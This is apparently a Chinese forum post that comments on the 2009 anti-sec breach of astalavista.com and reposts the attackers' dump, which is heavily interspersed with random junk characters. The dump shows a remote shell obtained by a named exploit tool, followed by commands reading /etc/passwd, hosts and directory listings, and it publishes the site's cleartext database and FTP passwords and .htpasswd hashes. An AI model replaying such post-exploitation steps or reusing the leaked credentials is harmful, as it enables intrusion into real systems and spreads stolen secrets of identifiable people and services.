里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。1 g9 k* _5 ?& E3 s: x1 e
8 }/ b+ h/ k9 ^% h" j5 h, J[root@front3 ~]# curl -I litespeedtech.com# t+ l7 q s) B/ A9 }
HTTP/1.1 200 OK% o% i! I' L% G1 O6 u$ m7 q
Date: Fri, 05 Jun 2009 22:54:51 GMT
4 z0 V8 w5 U. c0 M1 ^5 e ~' I4 K- m$ UServer: LiteSpeed% O" A0 g0 J1 i }* b7 Z+ l" J
3 P2 ~2 ~5 W$ r7 g5 D. }- a0 @ ?+ |, @另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
5 \6 p$ z, ^5 z( x; p* A4 U/ ~# S, w8 ^6 t9 F
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
! B% d2 s. L; c" g# E% W) d; |
0 [, H& `8 n# v; j5 L5 U% G6 b7 {" R
" [, t7 o0 ^) l% j$ P; S& d# d/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
5 M3 m% `; R% s* y' f/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \6 K, W2 ^. \1 H
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \& Y0 \; n$ |' m6 N+ Z$ K: g- _3 M
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
$ I8 s7 R: [9 s& K! q: c! C \/ \/ \/ \/ \/ \/ \/) O4 z* D- }6 O4 d! I
The Hacking & Security Community
. v2 r& z" v* b9 u ^[+] Founded in 1997 by a hacker computer enthusiast
2 P6 g6 V; _! {2 ~* I/ x' X$ _[-] Exposed in 2009 by anti-sec group
- r7 ^1 v, {' k5 o, \/ v8 m+ L; p" _: c2 O: P+ x
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:* m8 \$ M! B( ?/ D
>> 03. Who’s behind the site?
. S y, y# G# ]+ j* G>>
( U2 z" r- g U1 |& i>> A team of security and IT professionals, and a countless number of contributors from all over the world.
( u: e0 ? W- N2 ^/ K9 z' ?
/ j% }8 F& L/ ?>> 05. Is it true that the site is visited by script-kiddies and warez fans only?& C/ Z W- @8 e# Y! H
>>% d2 r" _: T4 D3 j6 {1 p/ h8 t; F! X
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and. {% i1 c# m9 D4 d
military institutions.9 ~8 i0 o7 k" V5 E! H+ [
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.6 S' j$ A; J: n# b" o+ E8 `: i
1 c* B% K$ p) O" u) r' BWhy has Astalavista been targeted?& |. j, N0 x+ w- `
" z0 W4 m( b# q& ~Other than the fact that they are not doing any of this for the “community” but4 S' |* D) ^1 ]8 C2 J
for the money, they spread exploits for kids, claim to be a security community8 z' j! m8 w( E: N6 U- |7 o5 C
(with no real sense of security on their own servers), and they charge you $6.66
$ B7 t- X' E/ V R* |per months to access a dead forum with a directory filled with public releases" r$ a5 s! g+ z( h# w7 n
and outdated / broken services.
, U& r2 E! y4 R. ~/ C2 B: w0 L0 ^' M- k: @5 l
We wanted to see how good that “team of security and IT professionals” really is.
% p3 v7 h) i' a3 a& |6 c8 O2 ~. W5 K) ~
Let’s begin.3 d d6 N' L/ [( V9 r8 ^8 j* Z
4 h# E- G! s X! h( o
anti-sec:~# ./g0tshell astalavista.com -p 80
1 \! _! v; S" @* P[+] Connecting to astalavista.com:80% X2 {; q K, v/ p
[+] Grabbing banner…1 o: }/ L9 x0 ^% i+ N3 X
LiteSpeed7 f3 z; i: x3 B2 m- K3 ?
[+] Injecting shellcode…, w6 ?- S- g4 ~/ F
[-] Wait for it, C% R+ T* }* r2 W
* W& d7 R2 t7 H6 p+ w; R3 I( X9 H& S[~] We g0tshell4 k4 ~9 j! I, F4 A1 f+ G# v& e
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux3 @* M8 m5 E2 x& l6 U. ^. [* Q
ID: uid=100(apache) gid=500(apache) groups=500(apache)
2 N0 z4 @# O! F2 v; X9 r$ b' c `/ ]' p- j% K; ]
sh-3.2$ cat /etc/passwd' a& ^. g& o9 d* [. `
root:x:0:0:root:/root:/bin/bash
& U( T& B$ L. Wbin:x:1:1:bin:/bin:/sbin/nologin; O7 o+ ^' d- V* f! f5 D; Z# I
daemon:x:2:2:daemon:/sbin:/sbin/nologin
. Y' n3 u) q2 Q( [" o( B4 c Jadm:x:3:4:adm:/var/adm:/sbin/nologin
* n0 F+ B; z+ \. a# r7 Q9 Q j* flp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- C8 t% B( i8 O1 [sync:x:5:0:sync:/sbin:/bin/sync
0 E X2 ]7 y C5 Ashutdown:x:6:0:shutdown:/sbin:/sbin/shutdown' k: d1 h/ R" E; ^$ o, O
halt:x:7:0:halt:/sbin:/sbin/halt" f; i& t* w% t& E
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- [/ M0 Z4 R- S/ rnews:x:9:13:news:/etc/news:. I [/ w7 B$ | b" z5 { M
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin1 ^; n3 ?: ^; ~& n9 `; P% n
operator:x:11:0 perator:/root:/sbin/nologin& l1 h! I! q- ?" K& [, C8 y6 l
games:x:12:100:games:/usr/games:/sbin/nologin1 l9 Z! ^5 ^" ?1 w' v# r
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
$ G, l- d* b/ z! `ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
. M C$ v. u+ a( q5 B% r& dnobody:x:99:99:Nobody:/:/sbin/nologin9 O2 {$ M4 _4 O! ^! X' W
rpm:x:37:37::/var/lib/rpm:/sbin/nologin! ?/ z( A* A4 O& |0 z& W3 M7 |- ~% g' V
dbus:x:81:81:System message bus:/:/sbin/nologin
. T- O4 ^# m2 @9 U0 T( Dnscd:x:28:28:NSCD Daemon:/:/sbin/nologin o: y/ {# Y" t% h) e. x6 t
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
. n: Z! O. C4 e! wsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
5 U9 j1 i+ X! r- Z T: P6 Nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin+ k4 U4 R$ A( f: C9 e, [# m
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
# s2 b& e# ^* g* E# b3 F% o- s- Drpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
8 V7 N& e3 I) J# }: {- v( |rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
( k2 q% x5 } Wnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin0 _1 G6 ]3 V; Y! b
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
2 x0 B9 Q4 @ T4 w9 J' epcap:x:77:77::/var/arpwatch:/sbin/nologin3 i- }) ?' Q6 z' c7 [+ p
named:x:25:25:Named:/var/named:/sbin/nologin4 d$ O, d: N V3 c
apache:x:100:500::/var/www:/bin/false
: E, ~) [& j# W, ~" m0 Q8 W' Gdiradmin:x:101:101::/usr/local/directadmin:/bin/bash7 l, N9 s/ n0 M! V
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash! \$ n2 C: f: N
webapps:x:500:501::/var/www/html:/bin/bash
, M! E' S. K3 \majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash9 B- d+ K" w0 D/ h
admin:x:501:502::/home/admin:/bin/bash
( g0 {- }: ^) G. O' hjon:x:502:503::/home/jon:/bin/bash
; q1 m/ w& W/ ~1 dcom:x:503:504::/home/com:/bin/bash1 D% l( }2 x) h+ Q/ y2 c
ntp:x:38:38::/etc/ntp:/sbin/nologin I! t. q$ I- b5 U
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin3 e1 R' T2 i; E. Z
astanet:x:504:505::/home/astanet:/bin/bash
5 ~: d: b# p$ b: navahi:x:70:70:Avahi daemon:/:/sbin/nologin+ O2 N+ h: n. J! z* h5 f. `7 F g, L
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin# T R3 |8 M2 Z2 z; M- H
8 u& a& o2 y; H9 v7 f0 F
sh-3.2$ cat /etc/hosts
7 M1 S* H; G1 [; O# Do not remove the following line, or various programs
# r* N. [2 @1 ^ ?' o$ K# that require network functionality will fail.
4 _" ?8 `+ D5 M- Q% g- [! {127.0.0.1 localhost.localdomain localhost
( g# t# q% M. [+ m& L::1 localhost6.localdomain6 localhost6
, G6 s& O6 x( A) D80.74.154.172 asta1.astalavistaserver.com
7 h; i% f" `8 P- W# o0 o3 m5 P- h* {$ q: N5 n' D" l8 T) T& @# T
sh-3.2$ pwd, n6 b6 k8 q: h8 ^# E. u
/home/com/public_html
$ e; g2 y% l2 m$ W3 l: t6 ~) N# v& u
) M9 P, E9 z3 E& k2 B3 ~sh-3.2$ ls -la" d9 y% @7 W) p; k w
total 184608 o! D4 g; O& }% D' m* G+ U
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
3 j# W" h2 k# _ f; ~. ^drwx–x–x 11 com com 4096 Jun 25 2008 ..
* H2 L9 p* ?2 c" [drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin: T+ c! l9 u) t
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
2 u( ~, I2 V3 w5 M/ w4 ]drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin$ L" m! K3 p! y' \$ G
drwxrwxrwx 2 com com 4096 May 19 00:50 config; p! ]! \& \2 x
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
5 S" K% C+ E6 u) J1 B5 o! M7 D7 J+ S7 Ddrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules8 W% v" C& j- f- C* k1 m# `* I& p
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing: j' L9 w% Y% b" L7 }( Z
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo3 k& m, @9 R8 ?. ~4 Q: p
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
% `. a! M1 Z; G1 D% ^. _+ f( l: h-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
% D0 v: P% G1 m j3 T- D+ s0 @drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd/ Y! ?+ r6 C, U6 ]6 J
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor: V9 V8 \) J! \! N v
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
9 ?0 F% ^4 V* t3 @3 `drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed7 f! e2 T* f4 W. Z
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess; f2 z+ t8 z. z; K0 N
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak9 B. Z2 |8 W/ s) w* }9 y& Z7 U5 A7 \
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak/ _+ h/ h- k3 U0 u
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool+ }6 H: |/ ^/ A1 h1 }. a# |, ~
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images i3 J- l% i8 E# M! [/ A
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php: ^# C3 V& R9 z9 o O* i
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
* d- y) w0 y5 w+ edrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
+ ?& \' i3 w! J% S1 ?9 ~) h$ gdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib8 o2 Q1 g7 p) d' @
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media: h! F z+ L ~5 u6 ~8 R
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
/ d, Z/ g7 H. c3 ?; h- K: bdrwxr-xr-x 34 com com 4096 May 28 16:30 modules
/ }6 l- Z; h) I: j6 v0 Qdrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
6 r; r4 Y0 b* ~7 ]$ Z" W, ]drwxrwxr-x 22 com com 4096 May 28 17:06 _new5 W: ]6 k1 y' ^$ k d
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
4 {- n2 o# l5 O4 Ldrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
: x5 u- F" B9 m( pdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
+ }: G9 \3 @0 y0 |-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
) T. f, c: U' O) ^) W3 r7 x-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml& o" r4 {0 i q0 l
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
) }! Y" V: _3 A+ ~: n9 Bdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
! ~( i' U' C* T' ?) s, h/ g6 v, ndrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp- U2 i& n9 m; x
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam! a+ o1 j7 O& W2 I
) W1 b# J/ \0 J' `! W
sh-3.2$ head -20 index.php
1 s) M" e' d5 E/ E/ h- H7 w( T<?php
3 ^. K% f$ O! r
a/ `- _9 [2 _+ l- H% e/**
9 s, H3 f7 |; E$ K d; {: M9 z* The main page for the CMS$ J8 g9 K8 e9 i+ \' ?! [
* @copyright CONTREXX CMS - COMVATION AG
) X- p9 n* P4 \7 r* @author Comvation Development Team* f# y( D/ ^0 L# T2 `$ E* v
* @version v1.0.9.10.1 stable
1 D0 q g. U0 e# i8 Z6 L* @package contrexx% _4 Y. x& p% A& h8 y" b
* @subpackage core Z0 m: G" X; m! x/ m! j. ]6 F) c4 Q, Q
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage" c) ]# _& I3 F/ U6 l- M6 Q
* @since v0.0.0.04 O0 {) ~% H# [# Z$ H1 E
* @todo Capitalize all class names in project) n7 L. e6 b4 L2 H- |$ e+ ~
* @uses /config/configuration.php2 @, T+ L; E: O2 u$ k$ b: \
* @uses /config/settings.php/ p% I( {5 e3 D' S, F
* @uses /config/version.php
1 J0 `7 Y2 h7 O$ k" m, _8 A; d6 j* @uses /core/API.php W, n1 p+ ^% X+ T; v. n
* @uses /core_modules/cache/index.class.php
+ U! b) C) D8 |8 a* H0 ]" N* @uses /core/error.class.php
/ Q6 X9 G: N( B( ~# \* @uses /core_modules/banner/index.class.php) T' r, @ m% P. N: u
* @uses /core_modules/contact/index.class.php
2 W& G+ G' f2 i! k- v3 y; d$ F# ?+ C6 a8 w% j \# X
sh-3.2$ cd config/' N( w5 m# ?8 v, ]
sh-3.2$ ls -la
* `, M( R2 y6 E( H( h7 B* vtotal 32
. _: v% y) g, \0 I1 Mdrwxrwxrwx 2 com com 4096 May 19 00:50 ., ~* O H l% c5 I. R( \; G/ V; _
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
; ?& Q) o# W' R* F' c9 a3 o-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
4 L8 `/ c# |# j& t4 L5 x-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
, S" ?& T. r7 Z! t& A* T-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
* R \4 Y* i$ c* Z. J X, ~0 H-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php3 ^- b+ C8 {, U2 n; d+ [9 P) V
7 T% n/ |+ J* d6 \sh-3.2$ cat configuration.php# X' V" |+ B4 f/ Z+ x/ m. P# f0 z2 T
[snip]
# a$ z% X, K; B6 p& Q$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost7 `3 s. k4 _- \1 s- B3 h
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
, i* o' C6 E/ _0 m3 r$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
$ l2 R: z# D- \5 W- }4 a6 `$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username5 I; w0 a h5 r
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password+ @' s' ]7 |; u: M2 Q8 s
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..), i5 g9 Y5 r' l/ x4 ?5 h [
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)6 y" N/ w# K! P) h& I4 p
[snip]+ U7 a" e) T$ w8 c% V3 Y
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
8 v l+ f7 S: O! m2 D$ p0 m4 H, B$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
! a: T( {" p0 B3 Z5 i6 m: x$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost8 Z" k }) z3 [2 q M" O, C
$_FTPCONFIG['port'] = 21; // Ftp remote port
7 k# W# `2 t2 }6 c, p) ^$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username6 e g: y3 {3 X! d/ r
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password4 ~; i! U+ J9 j
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
& }5 i5 G* i/ M. B
# R+ u" e" o: {0 J# s5 t! j# t5 Ush-3.2$ cd ..1 h$ I9 x/ w p" |# O( Z" i
sh-3.2$ cd dvd/2 v3 V& E# R2 Z5 D5 ^* R
sh-3.2$ ls -la, D4 Z" L9 k* I! b
total 2913780. K/ X7 e0 A: E) C7 Q% H
drwxr-xr-x 2 com com 4096 Sep 9 2008 .( c& H; r9 O0 W' s: K% K. r
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..4 D8 `9 ]8 W: b5 ]# O/ C
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
7 S- ~) B8 g; R) n/ b1 `' l+ a-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
4 d7 [5 `0 }4 j w4 }-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar/ g/ Z) t2 v/ \3 t# @/ B
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
, a/ y; m9 r* R* b3 V- o# n# L1 S- I( n0 X
sh-3.2$ cat .htaccess: `5 p$ E8 w, V8 S
authType Basic8 _$ a# m7 g' G) C. Y5 j+ N
authName DVD& r( @6 A, I4 o: K. [4 q
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
% t, R6 t8 ]9 brequire valid-user# j |4 {1 f7 `7 u
+ x) X) p: v7 s8 {sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd3 I, t. Q* M) Q/ W* s
DVDdownload:CRD8cuY6.MPT6
. B/ R6 E' [4 v% C' `) `DVDdownload2:CR8a36.wluFMg' K3 `6 Z% L& l8 B' p
! O2 P4 d+ B# T6 x9 Y% K+ u4 g
sh-3.2$ cat test.php5 t% [7 s2 p j- K7 @. L
<?php
2 t& s6 }* P5 m; L& Z+ c$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
! |$ B* U! e. ]# S, c Z$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));5 X3 p: ?( V7 N( G. v
echo $url;2 ^; n( l5 s! t; L- t
?>0 a+ h" S% x8 E9 I6 N
2 a) y) f5 H2 j; U9 Ysh-3.2$ cd modifications/
7 N8 T6 Q5 g0 f$ [9 [' F8 Ysh-3.2$ ls -la
3 U _! e& M: x) Gtotal 32# w9 j" i6 P# N1 a8 i
drwxr-xr-x 8 com com 4096 May 11 12:48 .
6 E2 k/ M7 m6 zdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..2 k7 r6 [1 @9 K& p
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
7 v, n8 Z. ?' a! v' E" Udrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
- p) b$ Z. Z' ~- P; odrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
5 p6 W2 o% V( edrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
4 o' p$ B; j4 N! E2 E. t% r8 `3 {drwxr-xr-x 2 com com 4096 Feb 2 19:33 search; R; j. X; A/ @* ~
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
9 ~9 e" q$ h& ?- C
! x6 ^6 `1 ~4 x2 }sh-3.2$ ls -R& \. e0 P t6 j6 C$ {
.:3 X3 G; x3 i0 {
com_avtng cronjobs onlinetools pjirc search _tmp
4 n# ~9 r* }3 x
' J- t8 G( F& k: _" c/ S./com_avtng:4 T3 ^" t1 L( w6 y* W! @' M
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts7 y5 Z* r1 q% s6 g0 i
5 e; d) i$ @% Z5 U' b
./com_avtng/scripts:) d) f6 ]& r7 K. |5 W( Y3 P
popunder.js
8 V7 \$ f. F+ [' x, o; |1 k- X( j# g$ |7 w+ C
./cronjobs:0 p9 b8 K+ U1 W% W5 @ o
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
C6 T$ g; \, l) U: f% g9 F( y5 O' Q$ l% l1 ^
./cronjobs/tmp:
2 M8 X0 h! e$ fcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv6 G" F1 A) U0 E$ m* T2 x' }* O
1 d8 l m) L' [4 m9 ?2 T( r
./onlinetools:* a1 Z0 Q% }! t! `9 _
index.php
+ R- n; M$ d9 m0 c0 ^$ }" _* n3 ]4 W' p4 N
./pjirc:- g2 A) _; `0 x
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
: _" N9 B$ V, [8 z+ W) OAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
, |$ u# F( E. C3 xbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
$ Y8 f1 k, H5 _
7 v9 e J# q9 E! B0 z./pjirc/img:
, [7 c# | A/ `3 range.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
( L3 v4 f; A$ c0 q5 barbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif 1 N9 m+ W0 u' T+ ]( a8 d5 V
verre-eau.gif
/ h) T8 M5 }( Z6 Jargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
9 v7 w- j5 T0 ?verre-vin.gif) O! C# o9 B4 p [' t
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
# B: b( e! x* @3 Ibiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
6 S1 G* }2 T' y: p
5 y( |. W; \9 w1 Z/ c* N./pjirc/snd:
4 b+ D; F. X5 D3 p* S+ h% y. cbell2.au ding.au
$ g" q1 Y, K! q8 J$ _, K% _9 `4 ]3 M& P1 N! L% \ l/ _
./search:# C' R. ]% f; f" W0 u
searchEngines.php search.php1 Q& \* j3 Q$ q) h
7 f$ M5 Z1 h$ V0 [: | a* k
./_tmp: u3 ^ N! S! | {# [; l1 R6 R; @$ T
defaultPorts.php defaultPorts.txt
, m, t, C+ v4 J6 i& Y$ B ~
$ i5 r( M6 H2 O) n' ?8 P2 Osh-3.2$ cd cronjobs/
/ H0 N/ ~1 g, H9 {# g/ T J; _ Csh-3.2$ cat exploits.php5 V9 r) ^) x% L7 T2 q( L
[snip]
, _7 T. X$ _. g% S4 ]$categories = array();2 ~* w% s0 k7 P
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
9 y- L- M" f* L6 T% z8 h$expolits = file($milw0rmFile);( q0 R, x t6 f5 K+ z2 v! ?
$comExploits = array();
+ L3 @, U( i4 T; i- T[snip]* F* c- U1 ?" \+ F
// manage data. a) d! T) E8 J! L9 w/ c' }. O, Y) n) _5 }
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 26401 E% P! c! r+ h" f. n ~/ G; | c
0 G% S; P9 Y# `' \: B1 h0 k$ G- Q9 a
// get path and title
' \, O5 H8 R. q5 Z/ J* B $expolits[$x] = trim($expolits[$x]);6 K2 y& z* y- S0 H# _/ P
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
! {" U* _4 ~3 F $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);3 |. F0 c3 q3 d5 M4 r
/ I% k9 B" |" t
// check if file exists2 k% Q& ?$ x) T1 u
if (file_exists($path)) {
6 Z3 ^. z# n8 g, q& z, ~3 U7 h! M6 Y. c9 E) K' @
$text = file_get_contents($path);
# _; y0 \% V; b, U) B; t
* k0 w8 p+ f3 L, g // get content and date
& ~: e0 I' p8 e //$text = htmlspecialchars($text, ENT_QUOTES);& x) [, v1 N# s5 K
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
5 h( s, {* @0 r# y if ($tmptext != ”) {
7 ~( J8 J7 k0 S' s1 i' i" r+ h5 v$ H $text = $tmptext;
3 ~9 t$ E9 R8 ?/ `7 t2 j } else {( O3 W( p# V6 K3 }
$text = addslashes(htmlentities($text, ENT_QUOTES));, J# ^8 ~6 q$ m; U$ ^: R
}
* U7 ~ G) q% O# e $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));/ \4 F* S `6 F# G6 {$ C# R& @
$tmp = explode('-', $date);
* d/ b0 O7 G: }2 I& @- H $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
6 Q2 E( U U0 D, Y: `' V! w $cat = getCategory ($path);
; P% ^8 f& H! S8 E3 l $ext = pathinfo(basename($path));
0 R# h' I9 Q) N7 [/ V- s $ext = $ext['extension'];9 o( y- t( T' d. W; B/ a4 k7 A1 O) O
$qStr = ”& C9 L3 \2 I, \ c' W
SELECT `id`4 J& z: ~7 _/ ^, T
FROM `contrexx_module_exploits`
/ T8 C9 p4 M& ]4 B WHERE `title` = ‘” . $title . “‘$ @4 B# ~5 R% W$ K
AND `date` = ‘” . $date . “‘
- V; s2 n8 t9 V2 n2 Y “;! {, D. X2 n8 h. H" Q' m( F
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
, j; M8 R9 g( E% b, j$ F T2 G $q = $_objDB->query($qStr);" W0 e! a [$ M% w
; Y9 ]4 q; q# U4 W' M if ($q->numRows() == 0) {8 d. o2 E" j; [9 r
8 a- n" o/ G% r" c1 a7 `; Z // prepare array
+ Y. x/ n: @ _( s3 K' Q% }$ J! k $comExploits[$x]['date'] = $date;1 v2 q2 G5 s$ u$ b4 c' S
$comExploits[$x]['title'] = $title;
; l" o; m( u; t6 T% E $comExploits[$x]['author'] = ‘milw0rm’;2 ]) t' D3 _- B3 V
$comExploits[$x]['text'] = $text;/ f/ B; p+ k `/ Y# `; I$ Z
$comExploits[$x]['source'] = $ext;- l+ `* H: D9 F# {# H2 a4 J
$comExploits[$x]['url1'] = ”;
" Z7 K" k Y4 {0 ?/ a7 l/ ?, r $comExploits[$x]['url2'] = ”;2 D# P) u$ T9 }5 I
$comExploits[$x]['catid'] = $cat;6 K! i2 I( ^9 j* t
$comExploits[$x]['lang'] = ‘2′;
/ [5 R4 q. Y$ z2 _7 A8 | $comExploits[$x]['userid'] = ‘12′;
- p& c+ @1 H1 D& h& Y& O0 M2 | $comExploits[$x]['startdate'] = ‘0000-00-00′;; W4 J% R7 q5 e* Z
$comExploits[$x]['enddate'] = ‘0000-00-00′;4 f) Y2 [/ |' v
$comExploits[$x]['status'] = ‘1′;( }1 ?8 ~* [' ~1 J, H
$comExploits[$x]['changelog'] = $date;
* B- C6 Z# ]8 |! o* t3 m8 y2 M9 u: Y, S9 n$ v1 Y
}
8 M/ x6 n- r8 Q4 N[snip]# S0 p3 u" @) B6 }. {, @, b
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
+ k& V( d5 _0 R. f0 A$ r5 ` E; n<rss version=”2.0″>* [; V; C+ W$ O1 f7 \
<channel>- R* P# [7 B& Y7 R, ?
<title>ASTALAVISTA.com - Exploits</title>! n$ l2 P/ ]# |7 e
